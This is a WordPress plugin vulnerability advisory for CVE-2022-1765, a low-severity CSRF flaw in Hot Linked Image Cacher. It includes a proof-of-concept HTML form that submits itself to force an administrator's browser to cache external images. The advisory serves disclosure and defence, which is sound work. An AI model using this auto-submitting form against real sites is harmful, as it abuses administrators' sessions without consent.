WordPress Plugin Vulnerabilities

Hot Linked Image Cacher <= 1.16 - Image upload/cache abuse via CSRF

Description

The plugin is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).

Proof of Concept

<form id="test" action="https://example.com/wp-admin/tools.php?page=hot-linked-image-cacher%2Fhotlinked-image-cacher.php" method="POST">
    <input type="text" name="domains[]" value="example.com">
    <input type="text" name="urlmethod" value="curl">
    <input type="text" name="postid" value="enter a post id here">
    <input type="text" name="step" value="3">
    <input type="text" name="Submit" value="Cache These Images »">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
hot-linked-image-cacher
No known fix

References

CVE
CVE-2022-1765

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
2.4 (low)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
b50e7622-c1dc-485b-a5f5-b010b40eef20

Timeline

Publicly Published
2022-05-17 (about 2 years ago)
Added
2022-05-17 (about 2 years ago)
Last Updated
2022-05-18 (about 2 years ago)

Other

Published
Title
Published
2014-11-25
Title
WordPress <= 4.0 - CSRF in wp-login.php Password Reset
Published
2023-06-13
Title
All Bootstrap Blocks < 1.3.7 - Cross-Site Request Forgery
Published
2022-05-17
Title
Useful Banner Manager <= 1.6.1 - Modify banners via CSRF
Published
2022-10-31
Title
Restaurant Menu < 2.3.2 - Multiple CSRF
Published
2022-06-20
Title
Cache Images < 3.2.1 - Image Upload / Import via CSRF